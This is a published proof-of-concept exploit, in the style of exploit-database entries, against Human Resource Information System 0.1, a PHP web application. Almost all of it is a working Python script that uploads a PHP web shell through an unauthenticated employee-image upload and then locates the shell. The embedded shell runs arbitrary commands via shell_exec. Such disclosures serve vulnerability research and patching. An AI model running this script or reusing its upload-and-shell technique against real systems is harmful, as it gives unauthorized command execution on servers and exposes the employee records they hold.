# Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)
# Date: 04-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html
# Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code
# Version: 0.1
# Tested on: PHP 7.4.11 , Linux x64_x86

############################################################################################################

# Description:
# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.

############################################################################################################

# Proof of concept:

#!/usr/bin/python3

import requests
import sys
from bs4 import BeautifulSoup

def find_shell(domain):
    req_2 = requests.get(domain + "/Admin_Dashboard/Add_employee.php")
    soup = BeautifulSoup(req_2.content , "html.parser")
    imgs = soup.find_all("img")
    for i in imgs:
        src = i['src']
        if ("shell.php" in src):
            print(" [!] Your shell is ready :) ==> " + domain + "/Admin_Dashboard/" + src + "\n")
            break
        else:
            continue

def upload_file(domain):

    print("\n [!] Uploading Shell . . .")
    payload =  """ 
    <!DOCTYPE html>
<html>
<head>
	<title> Shell </title>
</head>
<body>
	<form action="#" method="post">
		<input type="text" name="cmd" style="width: 300px; height: 30px;" placeholder="Your Command ...">
		<br><br>
		<input type="submit" name="submit" value="execute">
	</form>
<?php 
	$cmd = $_POST['cmd'];
	$result = shell_exec($cmd);
	echo "<pre>{$result}</pre>";
	
?>
</body>
</html>
    """
    
    h = {
        "Content-Type" : "multipart/form-data"
    }

    f = {'employee_image':('shell.php',payload,
                    'application/x-php', {'Content-Disposition': 'form-data'}
              )
    }
    d = {
        "emplo"              : "",
        "employee_companyid" : "test",
        "employee_firstname" : "test",
        "employee_lastname"  : "test",
        "employee_middlename" : "test",
        "branches_datefrom"  : "0011-11-11",
        "branches_recentdate" : "2222-11-11",
        "employee_position"  : "test",
        "employee_contact"   : "23123132132",
        "employee_sss"       : "test",
        "employee_tin"       : "test",
        "employee_hdmf_pagibig" : "test",
        "employee_gsis"      : "test"
    }
    url = domain + "/Admin_Dashboard/process/addemployee_process.php"
    req = requests.post(url , data=d , files = f)
    if req.status_code == 200:
        if ("Insert Successfully" in req.text):
            print("\n [!] Shell uploaded succefully\n")
            find_shell(domain)

    else:
        print("Exploit Failed 1")

def main():
    if len(sys.argv) != 2:
        print('[!] usage: %s <target url> ' % sys.argv[0])
        print('[!] eg: %s http://vulndomain.com' % sys.argv[0])
        sys.exit(-1)

    print("<><><><><><><><><><><><><><><><><><><><><><><><>")
    print("<>      Human Resource Information System     <>")
    print("<>               Shell Uploader               <>")
    print("<><><><><><><><><><><><><><><><><><><><><><><><>")
    target_domain = sys.argv[1]
    upload_file(target_domain)

if __name__ == "__main__":
  main()